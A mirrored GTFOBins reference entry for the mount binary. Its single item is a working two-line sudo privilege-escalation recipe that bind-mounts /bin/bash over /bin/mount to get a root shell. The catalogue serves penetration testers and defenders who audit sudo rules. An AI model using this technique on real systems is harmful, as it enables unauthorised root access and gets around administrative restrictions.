mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-03-13 19:18:09 +01:00
9 lines
190 B
Markdown
9 lines
190 B
Markdown
---
|
|
functions:
|
|
sudo-enabled:
|
|
- description: bind mount bash to the mount binary, as mount is sudo enabled.
|
|
code: |
|
|
sudo mount -o bind /bin/bash /bin/mount
|
|
sudo mount
|
|
---
|